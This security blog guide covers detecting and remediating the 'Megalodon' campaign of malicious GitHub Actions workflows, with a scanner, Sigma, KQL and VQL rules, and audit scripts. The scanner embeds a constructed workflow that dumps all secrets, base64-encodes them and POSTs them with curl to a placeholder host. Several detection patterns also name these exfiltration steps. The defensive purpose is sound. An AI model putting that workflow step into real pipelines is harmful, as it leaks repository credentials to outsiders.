
Megalodon GitHub Actions Attack: Detection and Remediation Guide

Security Arsenal Team
May 25, 2026
5 min read

Introduction

The integrity of the software supply chain is under siege. SecurityWeek has reported a large campaign, dubbed 'Megalodon', that has infected more than 5,500 GitHub repositories. Attackers push fake automated commits that inject malicious GitHub Actions workflows, and those workflows exist for one purpose: to siphon off CI/CD secrets, API keys and tokens. This is not a theoretical risk but an active, widespread abuse of the trust we place in automation. If your organization uses GitHub Actions, treat every secret those workflows can reach as exposed until you have verified otherwise. Immediate action is required to identify malicious workflows and rotate compromised secrets.

Technical Analysis

  • Affected Products/Platforms: GitHub (Cloud and Enterprise Server) repositories utilizing GitHub Actions.
  • CVE Identifiers: N/A (This is an abuse of legitimate functionality and identity spoofing, not a software vulnerability).
  • Attack Vector: The attack begins with a malicious push event. Attackers impersonate legitimate automated bots (e.g., Dependabot) or submit seemingly routine pull requests. These commits add or modify YAML files under .github/workflows/. Note that a pull_request workflow from a fork runs without repository secrets; the injected workflow pays off once it is merged into the default branch, pushed there directly, or triggered through pull_request_target, which does run with secrets.
  • Mechanism of Action: The injected YAML defines a workflow whose run: steps execute shell commands (bash or sh) on the runner. Secrets are not present in the runner environment by default: the workflow maps them in explicitly (env: TOKEN: ${{ secrets.TOKEN }}) or serialises all of them at once with ${{ toJSON(secrets) }}. The script then dumps the environment, typically base64-encodes it so the runner's log masking does not redact it, and uses curl or wget to exfiltrate it to an attacker-controlled command-and-control (C2) server.
  • Exploitation Status: Confirmed Active. Thousands of repositories are currently hosting these malicious workflows, indicating a successful, automated supply chain compromise.
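The indicators described in the mechanism above (and listed again under "Audit Workflow Files" in the Remediation section) can be applied mechanically to every workflow file in a checkout. The scanner below is an added example and is not Security Arsenal, SecurityWeek or GitHub code. It flags toJSON(secrets), bare printenv/env, base64, literal URLs to hosts outside an allow-list, and curl/wget whose destination is hidden in a variable. The two sample workflows are constructed, the `.invalid` collector host is a placeholder, and the allow-listed hosts are an assumption you extend with your own registries.

```python
"""Workflow-file scanner for the Megalodon indicators described above.
Added illustration, not Security Arsenal or GitHub code. Sample workflows
and the allow-listed host set are constructed assumptions."""
import re
from dataclasses import dataclass
from pathlib import Path
from typing import List

# Hosts a pipeline legitimately reaches; extend with your own domains (assumption).
ALLOWED_HOSTS = ("github.com", "githubusercontent.com", "pkg.github.com")

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
NET_TOOL_RE = re.compile(r"(?<![\w/.-])(curl|wget)(?![\w/.-])")
# Bare 'env'/'printenv' only: not 'env:' YAML keys, '/usr/bin/env python' shebangs
# or words such as 'environment'.
ENV_DUMP_RE = re.compile(r"(?<![\w/.-])(printenv|env)(?![\w/=:-])")
BASE64_RE = re.compile(r"(?<![\w/.-])base64(?![\w/.-])")
SECRETS_RE = re.compile(r"toJSON\(\s*secrets\s*\)")


@dataclass
class Finding:
    source: str
    line_no: int
    indicator: str
    text: str


def host_allowed(host: str) -> bool:
    """Suffix match on a label boundary, so evilgithub.com does not pass as github.com."""
    host = host.lower()
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)


def scan_text(source: str, text: str) -> List[Finding]:
    """Return one Finding per indicator per line of a workflow file."""
    findings: List[Finding] = []
    for no, line in enumerate(text.splitlines(), 1):
        hits = []
        if SECRETS_RE.search(line):
            hits.append("whole secrets context serialised via toJSON(secrets)")
        if ENV_DUMP_RE.search(line):
            hits.append("environment dump (printenv/env)")
        if BASE64_RE.search(line):
            hits.append("base64 encoding (defeats the runner's secret masking)")
        hosts = URL_RE.findall(line)
        hits += [f"URL to non-allow-listed host {h}" for h in hosts if not host_allowed(h)]
        if NET_TOOL_RE.search(line) and not hosts:
            hits.append("curl/wget without a literal URL (destination hidden in a variable)")
        findings += [Finding(source, no, h, line.strip()) for h in hits]
    return findings


def scan_directory(root: str) -> List[Finding]:
    """Scan every workflow file under root, e.g. the checkout directory of a build host."""
    findings: List[Finding] = []
    for pattern in ("**/.github/workflows/*.yml", "**/.github/workflows/*.yaml"):
        for path in sorted(Path(root).glob(pattern)):
            findings += scan_text(str(path), path.read_text(errors="replace"))
    return findings


# Constructed samples: a benign workflow and one shaped like the campaign's injected step.
BENIGN = """\
name: build
on: [push, pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: curl -sSL https://raw.githubusercontent.com/example/tool/main/install.sh -o install.sh
      - run: make test
"""

MALICIOUS = """\
name: ci
on: push
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Setup
        env:
          ALL: ${{ toJSON(secrets) }}
        run: |
          printenv | base64 -w0 > /tmp/.e
          curl -s -X POST --data-binary @/tmp/.e https://collector.invalid/upload
"""

if __name__ == "__main__":
    for f in scan_text("constructed-malicious.yml", MALICIOUS):
        print(f"{f.source}:{f.line_no}: {f.indicator}: {f.text}")
```

Run `scan_directory("/path/to/checkouts")` on a build host to cover every repository at once. The allow-list check matches on a label boundary on purpose: a plain `endswith("github.com")` would wave through `evilgithub.com`, and an attacker choosing a look-alike host is cheap.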

Detection & Response

SIGMA Rules

The following Sigma rules target process creation on the runner host (Linux) to detect the exfiltration techniques used in this campaign. They need process telemetry such as auditd or Sysmon for Linux, so they apply to self-hosted runners; GitHub-hosted runners expose no such stream to your SIEM.

YAML
---
title: Potential GitHub Actions Exfiltration via Curl or Wget
id: 9c5e2f1a-3b4d-4e8f-9a0b-1c2d3e4f5a6b
status: experimental
description: Detects curl or wget launched from a GitHub Actions run step with a literal URL outside GitHub's own domains, a pattern used in repository supply chain attacks like Megalodon to exfiltrate secrets. A destination passed in a variable is not caught; pair with the environment-dump rule below.
references:
  - https://www.securityweek.com/over-5500-github-repositories-infected-in-megalodon-supply-chain-attack/
author: Security Arsenal
date: 2026-04-06
tags:
  - attack.execution
  - attack.t1059.004
  - attack.exfiltration
  - attack.t1041
logsource:
  category: process_creation
  product: linux
detection:
  selection_tool:
    Image|endswith:
      - '/curl'
      - '/wget'
  # run: steps are written to $RUNNER_TEMP (.../_work/_temp on self-hosted runners)
  # and executed inside the job workspace under .../_work/
  selection_runner:
    - ParentCommandLine|contains: '/_temp/'
    - CurrentDirectory|contains: '/_work/'
  selection_url:
    CommandLine|contains: '://'
  # process_creation events carry no destination hostname; filter on the URL in the command line
  filter_github:
    CommandLine|contains:
      - '://github.com/'
      - '.github.com/'
      - '.githubusercontent.com/'
      - '://pkg.github.com/'
  condition: all of selection_* and not filter_github
falsepositives:
  - Legitimate package or tool downloads from third-party hosts in CI pipelines; add your artifact registries to the filter
level: high
---
title: Suspicious Environment Variable Dumping in CI Runner
id: a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects 'printenv' or 'env' run without arguments from a GitHub Actions run step, used to dump mapped secrets before exfiltration in supply chain attacks. 'env' with arguments (shebang-style '/usr/bin/env python') is excluded.
references:
  - https://www.securityweek.com/over-5500-github-repositories-infected-in-megalodon-supply-chain-attack/
author: Security Arsenal
date: 2026-04-06
tags:
  - attack.credential_access
  - attack.t1552
logsource:
  category: process_creation
  product: linux
detection:
  selection_tool:
    Image|endswith:
      - '/printenv'
      - '/env'
    CommandLine|re: '^\S*(printenv|env)\s*$'
  selection_runner:
    - ParentCommandLine|contains: '/_temp/'
    - CurrentDirectory|contains: '/_work/'
  condition: all of selection_*
falsepositives:
  - Developers debugging environment issues in CI
level: medium

KQL (Microsoft Sentinel / Defender)

This hunt query targets GitHub audit logs for the initial infection vector: pushes and workflow runs that could carry an injected workflow. Audit-log git.push events record the actor, repository and ref but not the files touched, so the path filter only works if you also ingest push webhook payloads; otherwise a first-seen workflow name and an unfamiliar actor are the primary signals.

KQL — Microsoft Sentinel / Defender
// Hunt for pushes and workflow runs that could carry an injected workflow.
// Table and field names depend on the connector (the Sentinel polling connector
// writes GitHubAuditLogPolling_CL); adjust them to your ingested schema.
GitHubAuditLog
| where OperationName in ('git.push', 'workflows.created_workflow_run')
| extend RepoName = tostring(properties.repo)
| extend Actor = tostring(properties.actor)
| extend PushedRef = tostring(properties.ref)
| extend WorkflowName = tostring(properties.name)
// Changed paths are only present if push webhook payloads (commits[].added / .modified)
// are ingested alongside the audit log; a substring match over the serialised value
// avoids depending on the exact nesting.
| extend Pushes = tostring(properties.pushes)
| where OperationName == 'workflows.created_workflow_run' or Pushes contains '.github/workflows'
| project TimeGenerated, Actor, OperationName, RepoName, PushedRef, WorkflowName, Pushes
| order by TimeGenerated desc

Velociraptor VQL

Use this artifact to hunt for suspicious YAML files containing exfiltration keywords within cloned repositories on developer endpoints or build servers.

VQL — Velociraptor
-- Hunt for suspicious keywords in GitHub Actions workflow files under RepoRoot.
-- OSPath is the path column on recent Velociraptor releases (older ones expose FullPath).
LET RepoRoot = "/home"   -- where repositories are cloned on this host; adjust as needed
SELECT OSPath, Mtime, Size,
       read_file(filename=OSPath, length=65536) AS Content
FROM glob(globs=["**/.github/workflows/*.yml",
                 "**/.github/workflows/*.yaml"], root=RepoRoot)
WHERE Content =~ "(curl|wget).*https?://"
   OR Content =~ "toJSON.secrets"
   OR Content =~ "base64"
   OR Content =~ "printenv"

Remediation Script

This Bash script walks a directory for git repositories, greps their workflow files for the keywords used above, and lists who changed .github/workflows recently so those commits can be reviewed.

Bash / Shell
#!/bin/bash
# Scan local git repositories for Megalodon-style workflow indicators and list
# recent commits that touched .github/workflows for manual review.
set -u
SCAN_DIR="${1:-.}"
SINCE="${2:-90 days ago}"
PATTERN='(curl|wget).*http|printenv|base64|toJSON\(secrets\)'

echo "[+] Scanning $SCAN_DIR for compromised GitHub Actions workflows..."

# .git is a directory for a normal clone and a file for worktrees/submodules; git -C handles both
find "$SCAN_DIR" -name ".git" -print0 | while IFS= read -r -d '' git_dir; do
    repo_dir=$(dirname "$git_dir")
    workflow_dir="$repo_dir/.github/workflows"
    [ -d "$workflow_dir" ] || continue

    echo "[!] Checking workflows in: $repo_dir"
    grep -l -E "$PATTERN" "$workflow_dir"/*.yml "$workflow_dir"/*.yaml 2>/dev/null | while read -r file; do
        echo "    [WARNING] Potential exfil keyword found in: $file"
    done
    # %G? is the signature status (G = good, N = unsigned); unknown authors and
    # unsigned '[bot]' commits need a human look.
    git -C "$repo_dir" log --since="$SINCE" --date=short \
        --format='    [COMMIT] %h %G? %an <%ae> %ad %s' -- .github/workflows
done

echo "[+] Scan complete. Manually review any warnings."

Remediation

  1. Immediate Secret Rotation: Treat every repository and organization secret reachable by Actions (GH_TOKEN and personal access tokens, cloud provider keys, database passwords, signing keys) over the last 6 months as compromised. Rotate them immediately and revoke the old values rather than only replacing them, so that anything already exfiltrated stops working.
  2. Audit Workflow Files: Inspect every YAML file in .github/workflows/ across all repositories. Look for:
    • Unknown or recently modified files.
    • Steps executing curl, wget, or bash with encoded strings.
    • ${{ toJSON(secrets) }} or the whole secrets context mapped into env:.
    • References to external URLs not associated with your organization.
  3. Review Commit History: Identify "fake automated" commits: commits attributed to accounts you do not recognize, to bots that are not installed in your organization, or to bot identities such as dependabot[bot] whose author email is not a GitHub noreply address or whose commit is unsigned.
  4. Implement Branch Protection: Require pull request reviews before anything is merged to the default branch. Branch protection cannot restrict by path, so add a CODEOWNERS entry for /.github/workflows/ with required code-owner review, require approval before workflows run for pull requests from forks, and set the default GITHUB_TOKEN permissions to read-only.
  5. Official Advisory: Review any advisory GitHub publishes for this campaign, and the SecurityWeek report referenced above, for updated IOCs and specific recommendations.
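Step 3 above is easiest to apply to the output of git log rather than by reading commits one by one. The triage below is an added example, not Security Arsenal or GitHub code. It consumes lines produced by `git log --format='%H%x09%an%x09%ae%x09%G?%x09%s' -- .github/workflows`, where %G? is git's signature status (G = good, N = unsigned, E = could not be checked, which is what you see for a GitHub-signed commit when GitHub's web-flow key is not in your keyring). The sample log lines, their placeholder hashes and the organization domain list are constructed assumptions; dependabot[bot] is named because the page mentions Dependabot impersonation and its real commits arrive from a users.noreply.github.com address and are signed.

```python
"""Triage git log output for fake automated commits that touched workflows.
Added illustration, not Security Arsenal or GitHub code; sample lines and the
organisation domain list are constructed assumptions."""
from typing import List, Tuple

# Email domains of your human committers (assumption; set to your own).
ORG_DOMAINS = ("example.com",)
# Bots that commit through GitHub's API: noreply author address and a GitHub signature.
GITHUB_NOREPLY = "@users.noreply.github.com"
API_SIGNED_BOTS = {"dependabot[bot]"}

# Constructed sample of: git log --format='%H%x09%an%x09%ae%x09%G?%x09%s' -- .github/workflows
# Hashes are placeholders, not real commits.
SAMPLE_LOG = "\n".join([
    "1111111111111111111111111111111111111111\tdependabot[bot]\tdependabot[bot]@users.noreply.github.com\tG\tBump actions/cache from 3 to 4",
    "2222222222222222222222222222222222222222\tdependabot[bot]\tdependabot@ci-updates.invalid\tN\tchore: update workflow",
    "3333333333333333333333333333333333333333\tAlice Dev\talice@example.com\tG\tci: add coverage step",
    "4444444444444444444444444444444444444444\tdependabot[bot]\tdependabot[bot]@users.noreply.github.com\tN\tBump actions/setup-node",
    "5555555555555555555555555555555555555555\tNew Contributor\tsomeone@contributor.invalid\tN\tfix typo in workflow",
])


def parse_log(text: str) -> List[Tuple[str, str, str, str, str]]:
    """Split tab-separated log lines into (sha, author, email, sig_status, subject)."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\t", 4)
        if len(parts) != 5:
            raise ValueError(f"malformed log line: {line!r}")
        rows.append(tuple(parts))
    return rows


def triage(text: str) -> List[Tuple[str, str]]:
    """Return (short_sha, reason) for each commit that needs a human look."""
    flagged = []
    for sha, name, email, sig, _subject in parse_log(text):
        short = sha[:8]
        if name.endswith("[bot]"):
            if not email.endswith(GITHUB_NOREPLY):
                # A bot display name with an outside address is the impersonation pattern.
                flagged.append((short, f"bot name '{name}' with non-GitHub email {email}"))
            elif name in API_SIGNED_BOTS and sig == "N":
                # GitHub signs these bots' commits; 'N' means no signature at all.
                flagged.append((short, f"bot name '{name}' but the commit is unsigned"))
            # Other [bot] identities (e.g. github-actions[bot]) commit via plain git in
            # workflows and are routinely unsigned, so they are judged on email only.
        elif not any(email.lower().endswith("@" + d) for d in ORG_DOMAINS):
            flagged.append((short, f"author outside organisation: {email}"))
    return flagged


if __name__ == "__main__":
    for short, reason in triage(SAMPLE_LOG):
        print(f"{short}  {reason}")
```

Pipe real output in with `git log --format='%H%x09%an%x09%ae%x09%G?%x09%s' -- .github/workflows | python3 triage.py` after replacing SAMPLE_LOG with sys.stdin.read(). The check deliberately treats only N (no signature) as a red flag for API-committing bots: E is what a genuine Dependabot commit shows on a host without GitHub's public key, and flagging it would bury the real findings.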
